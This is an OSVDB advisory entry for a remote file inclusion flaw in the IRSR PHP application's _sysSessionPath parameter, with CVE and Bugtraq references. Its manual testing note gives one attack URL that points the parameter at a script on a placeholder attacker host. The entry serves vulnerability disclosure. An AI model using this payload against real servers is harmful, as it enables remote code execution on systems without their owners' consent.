Roaming System Remote (IRSR) pageheaderdefault.inc.php _sysSessionPath Variable Remote File Inclusion

2006-08-17T22:55:06
ID OSVDB:29477
Type osvdb
Reporter OSVDB
Modified 2006-08-17T22:55:06

Description

Manual Testing Notes

http://[target]/[IRSR_path]/system/includes/pageheaderdefault.inc.php?_sysSessionPath=[http://[attacker]/evil_scripts.txt]

References:

ISS X-Force ID: 28427 Generic Exploit URL: http://www.milw0rm.com/exploits/2199 CVE-2006-4237 Bugtraq ID: 19567